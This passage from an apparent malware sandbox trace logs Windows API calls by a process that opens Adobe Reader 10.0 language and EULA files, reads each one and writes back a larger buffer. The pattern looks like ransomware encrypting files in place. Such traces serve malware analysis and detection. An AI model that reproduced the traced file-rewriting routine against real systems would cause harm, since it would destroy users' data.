lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0066.193] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x35a0 [0066.193] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0066.194] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x35a0 [0066.194] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea9ab8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0066.194] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0066.194] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0066.194] CloseHandle (hObject=0x1dc) returned 1 [0066.196] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0066.198] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0066.198] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1e00 [0066.198] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0066.198] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0066.198] ReleaseMutex (hMutex=0x168) returned 1 [0066.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.CZE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0066.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.CZE", cchWideChar=11, lpMultiByteStr=0x1f7358c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.CZE", lpUsedDefaultChar=0x0) returned 11 [0066.198] ReadFile (in: hFile=0x1dc, lpBuffer=0x2864f58, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2864f58*, lpNumberOfBytesRead=0x2b1f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0066.200] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0066.200] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea7988*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea7988*, lpNumberOfBytesWritten=0x2b1f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0066.201] CloseHandle (hObject=0x1dc) returned 1 [0066.208] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.ita"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0066.211] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0066.211] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1e00 [0066.211] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0066.211] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0066.211] ReleaseMutex (hMutex=0x168) returned 1 [0066.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.ITA", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0066.211] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.ITA", cchWideChar=11, lpMultiByteStr=0x1f7328c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.ITA", lpUsedDefaultChar=0x0) returned 11 [0066.211] ReadFile (in: hFile=0x1dc, lpBuffer=0x2864f58, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2864f58*, lpNumberOfBytesRead=0x2b1f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0066.213] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0066.213] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea7988*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea7988*, lpNumberOfBytesWritten=0x2b1f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0066.214] CloseHandle (hObject=0x1dc) returned 1 [0066.405] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AIR\\nppdf32.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\air\\nppdf32.rus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0066.794] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0066.802] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1e00 [0066.808] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0066.808] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0066.808] ReleaseMutex (hMutex=0x168) returned 1 [0066.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.RUS", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0066.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.RUS", cchWideChar=11, lpMultiByteStr=0x1f7344c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.RUS", lpUsedDefaultChar=0x0) returned 11 [0066.808] ReadFile (in: hFile=0x1dc, lpBuffer=0x2668a38, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesRead=0x2b1f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0066.810] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0066.810] WriteFile (in: hFile=0x1dc, lpBuffer=0x2668a38*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesWritten=0x2b1f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0066.811] CloseHandle (hObject=0x1dc) returned 1 [0066.818] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0067.011] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0067.011] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1e00 [0067.011] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0067.011] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0067.011] ReleaseMutex (hMutex=0x168) returned 1 [0067.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.CHS", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0067.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.CHS", cchWideChar=11, lpMultiByteStr=0x1f7340c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.CHS", lpUsedDefaultChar=0x0) returned 11 [0067.011] ReadFile (in: hFile=0x1dc, lpBuffer=0x2668a38, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesRead=0x2b1f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0067.023] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0067.024] WriteFile (in: hFile=0x1dc, lpBuffer=0x2668a38*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesWritten=0x2b1f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0067.024] CloseHandle (hObject=0x1dc) returned 1 [0067.026] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.hrv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0067.026] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0067.026] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1e00 [0067.026] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0067.026] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0067.026] ReleaseMutex (hMutex=0x168) returned 1 [0067.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.HRV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0067.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.HRV", cchWideChar=11, lpMultiByteStr=0x1f733cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.HRV", lpUsedDefaultChar=0x0) returned 11 [0067.027] ReadFile (in: hFile=0x1dc, lpBuffer=0x2668a38, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesRead=0x2b1f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0067.035] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0067.035] WriteFile (in: hFile=0x1dc, lpBuffer=0x2668a38*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesWritten=0x2b1f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0067.036] CloseHandle (hObject=0x1dc) returned 1 [0067.039] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.ptb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0067.040] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0067.040] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1e00 [0067.040] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0067.040] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0067.040] ReleaseMutex (hMutex=0x168) returned 1 [0067.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.PTB", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0067.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.PTB", cchWideChar=11, lpMultiByteStr=0x1f7344c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.PTB", lpUsedDefaultChar=0x0) returned 11 [0067.040] ReadFile (in: hFile=0x1dc, lpBuffer=0x2668a38, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesRead=0x2b1f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0067.046] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0067.046] WriteFile (in: hFile=0x1dc, lpBuffer=0x2668a38*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesWritten=0x2b1f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0067.047] CloseHandle (hObject=0x1dc) returned 1 [0067.054] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.UKR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.ukr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0067.055] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0067.055] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1e00 [0067.055] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0067.055] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0067.055] ReleaseMutex (hMutex=0x168) returned 1 [0067.055] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.UKR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0067.055] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.UKR", cchWideChar=11, lpMultiByteStr=0x1f733cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.UKR", lpUsedDefaultChar=0x0) returned 11 [0067.055] ReadFile (in: hFile=0x1dc, lpBuffer=0x2668a38, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesRead=0x2b1f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0067.060] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0067.060] WriteFile (in: hFile=0x1dc, lpBuffer=0x2668a38*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesWritten=0x2b1f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0067.061] CloseHandle (hObject=0x1dc) returned 1 [0067.063] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHT\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cht\\eula.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0067.064] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0067.064] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1e0 [0067.064] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0067.064] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0067.064] ReleaseMutex (hMutex=0x168) returned 1 [0067.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0067.064] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x1f7340c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.ini", lpUsedDefaultChar=0x0) returned 8 [0067.064] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f5cf28, nNumberOfBytesToRead=0x1e0, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f5cf28*, lpNumberOfBytesRead=0x2b1f2bc*=0x1e0, lpOverlapped=0x0) returned 1 [0067.066] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0067.066] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a0038*, nNumberOfBytesToWrite=0x768, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a0038*, lpNumberOfBytesWritten=0x2b1f2d0*=0x768, lpOverlapped=0x0) returned 1 [0067.066] CloseHandle (hObject=0x1dc) returned 1 [0067.068] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ENU\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\enu\\eula.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0067.068] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0067.068] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x410 [0067.069] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0067.069] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0067.069] ReleaseMutex (hMutex=0x168) returned 1 [0067.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0067.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x1f733cc, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.ini", lpUsedDefaultChar=0x0) returned 8 [0067.069] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e99938, nNumberOfBytesToRead=0x410, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99938*, lpNumberOfBytesRead=0x2b1f2bc*=0x410, lpOverlapped=0x0) returned 1 [0067.694] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0067.694] WriteFile (in: hFile=0x1dc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x998, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x998, lpOverlapped=0x0) returned 1 [0067.694] CloseHandle (hObject=0x1dc) returned 1 [0067.705] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HRV\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\hrv\\eula.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0067.706] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0067.706] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x470 [0067.706] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0067.706] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0067.707] ReleaseMutex (hMutex=0x168) returned 1 [0067.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0067.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x1f7346c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.ini", lpUsedDefaultChar=0x0) returned 8 [0067.707] ReadFile (in: hFile=0x1dc, lpBuffer=0x269c668, nNumberOfBytesToRead=0x470, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269c668*, lpNumberOfBytesRead=0x2b1f2bc*=0x470, lpOverlapped=0x0) returned 1 [0067.709] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0067.709] WriteFile (in: hFile=0x1dc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9f8, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x9f8, 